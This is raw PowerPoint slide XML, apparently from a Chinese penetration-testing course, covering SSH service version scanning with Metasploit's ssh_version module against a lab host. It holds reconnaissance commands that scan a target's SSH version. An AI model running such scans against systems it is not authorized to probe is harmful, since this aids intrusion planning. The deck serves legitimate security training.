            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="文本框 110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5369560" y="718820"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.在Kali Linux终端界面中输入“msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命令，打开Metasploit框架。使用“search ssh_version”命令找出ssh_version模块使用路径，如图2-4-22所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5369560" y="1917700"/>
            <a:ext cx="5276850" cy="2076450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="文本框 111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5369560" y="3994150"/>
            <a:ext cx="5080000" cy="1506220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-22 ssh_version模块使用路径2.输入“use auxiliary/scanner/ssh/ssh_version”命令使用ssh_version扫描模块，这个模块能够扫描SSH服务的版本，如图2-4-23所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5472430" y="5471160"/>
            <a:ext cx="3733800" cy="466725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="文本框 112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4912360" y="5937885"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-23 使用ssh_version扫描模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行SSH服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤三</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="文本框 112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5395595" y="696595"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.使用“show options”命令查看当前模块需要设置的参数，如图2-4-24所示。从执行的结果中可以看到ssh_version模块的4个参数分别是 RHSOTS、RPORT、THREADS、TIMEOUT。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5395595" y="1895475"/>
            <a:ext cx="5276850" cy="1533525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="文本框 113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5395595" y="3429000"/>
            <a:ext cx="5080000" cy="1263650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-24 查看模块需要设置的参数4.使用“set RHOSTS 192.168.172.131”命令设置扫描目标主机地址，如图2-4-25所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5395595" y="4692650"/>
            <a:ext cx="5276850" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="文本框 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5395595" y="5283200"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-25 设置模块参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
